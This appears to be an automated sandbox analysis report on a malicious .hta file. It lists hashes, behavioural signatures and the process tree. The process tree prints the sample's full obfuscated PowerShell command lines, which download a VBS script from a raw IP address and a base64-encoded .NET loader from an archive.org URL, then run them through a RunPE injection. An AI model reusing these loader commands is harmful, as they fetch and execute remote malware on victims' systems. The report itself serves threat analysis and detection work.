Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
26-09-2024 01:16
Static task
static1
Behavioral task
behavioral1
Sample
2377328ff0a0b26133c534cb523576567f94d73726102f905e97f813b20a86a2.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2377328ff0a0b26133c534cb523576567f94d73726102f905e97f813b20a86a2.hta
Resource
win10v2004-20240802-en
General
-
Target
2377328ff0a0b26133c534cb523576567f94d73726102f905e97f813b20a86a2.hta
-
Size
115KB
-
MD5
d6a04e7ba31d063b7176e3f9fc96c46a
-
SHA1
e8929b14ea18c20d4a81ac3faf681031924c9d14
-
SHA256
2377328ff0a0b26133c534cb523576567f94d73726102f905e97f813b20a86a2
-
SHA512
81fc9692f3e031cedbfd0623b69b21017504a8376e14ef3ee002b14517e857e45b07191bb84436e1bfebf1fa8fd6a375dc61716bebb253db2e4c015f740424b0
-
SSDEEP
96:Ea+M7XjJ7GJyXOVKBhqCJgqC8R7JR2JacLZL+dJAcAT:Ea+QXjJaJpKBgVOJEJwdJArT
Malware Config
Extracted
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2532 powershell.exe 6 676 powershell.exe 7 676 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2436 powershell.exe 676 powershell.exe -
Evasion via Device Credential Deployment 1 IoCs
pid Process 2532 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2532 powershell.exe 2532 powershell.exe 2532 powershell.exe 2436 powershell.exe 676 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2532 powershell.exe Token: SeDebugPrivilege 2436 powershell.exe Token: SeDebugPrivilege 676 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 1260 wrote to memory of 2128 1260 mshta.exe 30 PID 1260 wrote to memory of 2128 1260 mshta.exe 30 PID 1260 wrote to memory of 2128 1260 mshta.exe 30 PID 1260 wrote to memory of 2128 1260 mshta.exe 30 PID 2128 wrote to memory of 2532 2128 cmd.exe 32 PID 2128 wrote to memory of 2532 2128 cmd.exe 32 PID 2128 wrote to memory of 2532 2128 cmd.exe 32 PID 2128 wrote to memory of 2532 2128 cmd.exe 32 PID 2532 wrote to memory of 2704 2532 powershell.exe 33 PID 2532 wrote to memory of 2704 2532 powershell.exe 33 PID 2532 wrote to memory of 2704 2532 powershell.exe 33 PID 2532 wrote to memory of 2704 2532 powershell.exe 33 PID 2704 wrote to memory of 2824 2704 csc.exe 34 PID 2704 wrote to memory of 2824 2704 csc.exe 34 PID 2704 wrote to memory of 2824 2704 csc.exe 34 PID 2704 wrote to memory of 2824 2704 csc.exe 34 PID 2532 wrote to memory of 2764 2532 powershell.exe 36 PID 2532 wrote to memory of 2764 2532 powershell.exe 36 PID 2532 wrote to memory of 2764 2532 powershell.exe 36 PID 2532 wrote to memory of 2764 2532 powershell.exe 36 PID 2764 wrote to memory of 2436 2764 WScript.exe 37 PID 2764 wrote to memory of 2436 2764 WScript.exe 37 PID 2764 wrote to memory of 2436 2764 WScript.exe 37 PID 2764 wrote to memory of 2436 2764 WScript.exe 37 PID 2436 wrote to memory of 676 2436 powershell.exe 39 PID 2436 wrote to memory of 676 2436 powershell.exe 39 PID 2436 wrote to memory of 676 2436 powershell.exe 39 PID 2436 wrote to memory of 676 2436 powershell.exe 39
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\2377328ff0a0b26133c534cb523576567f94d73726102f905e97f813b20a86a2.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1260 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2532 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bk36txle.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA297.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA296.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2824
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:676
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5364c523969af7503c09d396c3a804df4
SHA14a5f6f69a75821c23078e4921ef64d5d6c4c8169
SHA256068f695b87410c807830e24cc22b6d2830ac79e58d82085b9df4dcbda150c15c
SHA5122f11d549a6cfba0ac1e93d0627f0dd42ab43ce3c8bbabc640dd11ec4ea0932abed0045baeaaad29b4b14df2e71b5dbb032730ae5b83587aff7202c5f6a3f307d
-
Filesize
3KB
MD52099eb3dc346936d51579d2e10022aca
SHA144c50580bad727f04d6bb584142f1aa70f26c7fe
SHA2565be55637373d7a0f00fe9b24af2aa344fcfcc945bb39fd400e658fd129de28cb
SHA51204e630cd1f5c9d416d7e14ab5f5787d49929b82d97608081a3915de7c2a1072dcaceb76506b5b10146aa950b877899e102920b92e8040f71e7f44addbc97a10c
-
Filesize
7KB
MD5a73630e3f3a3d30132293bf0c2b8c232
SHA146790bfc1159f053dbbbfa8f856cef3933d86e4b
SHA256bceead64423fcb118441cc54acf11bfaa349edf5f0a978a165c153dbce7e017c
SHA512fdf7bafaee811ef3a12988954ae02c13de959c2e41d5ae0a37d143022f2657c6cebbc914383294d93d9be15ce3200efb8fd393113779ececfe4d1159c62f6b80
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD52e65d1987e55689aabd97006984a68cb
SHA18f5ca6a2a01553d183f51a0490eb07cc628c8b92
SHA2566bdf55eb73359648e070b40c172ab77c325b76cd19b1c8f6146a1fe2bfc40935
SHA51274eb196ba95190239697391c1297f9b2bc33f8c3984e46cc4443cf4d2de749b3cde56b6742d10d584adcfef7f288e503d26a8a0ebd3216a2fe06fe1e43837e65
-
Filesize
254KB
MD510a145cb87654a33c6c0beda947466b8
SHA1a504192f1b5ac44e6e49b4bc9ef660220c604469
SHA25680e7c85eeb0a57e9f50e7d84e0eb1b2f2230837b53080d24696fab7373e9bc03
SHA512fbc4f71668b7af09338ae7060c04dd8feed091b3b7adb490647c92d731cefca4b1e929d36f750563ff0afa14b797984625eaf964f25a3f71b597343d79ec891a
-
Filesize
652B
MD5415843686e121961946f433aea585d0f
SHA1a9f9e055daa73c5b82d14d87c2c366bcd9e26a65
SHA256413f7da2956be45c580addf902862e8c5c93f996c0fceff82b9748195c0b220a
SHA5121913e83b806bb0d228f95c4cac6e6c2c35d409347a53c219238deb357faef336eda478c26a4c286a30e8463cb475d933a9028f71410dda338f3d5d8a76486450
-
Filesize
474B
MD5f884800327d4027747da358d54a2953c
SHA1b1d1103720a4787bb3cb5832461f367275978422
SHA25613de24eeafc24c4a53199d015b92dd5ddcd552ceaa74fb14d2bbb26dc6366e9b
SHA512cbfd55f5481da04f30d8590b64cc314751b158cbf775686a11f430b0619d069adc16c2a387fd1789b49a10aa760b4ab36cb12f96f21c4208abb89a5f0d52c520
-
Filesize
309B
MD5bd8cb48cc24397bbd94df793e99dea08
SHA126c130e3df71ba9af4c1e5d6f03c7e1024c77ffd
SHA256cbee387ee09b57e034991a83a8763160bbb28848f6f84e324e24ed2a95da7e01
SHA512dfbd8f431220343d32352dfdb885c680dd4c32edbba38667214b62ee5a7b68b55da7da47738e231f3f127e63885d6152dcf1310cc8cda759c1a7a09d7435f973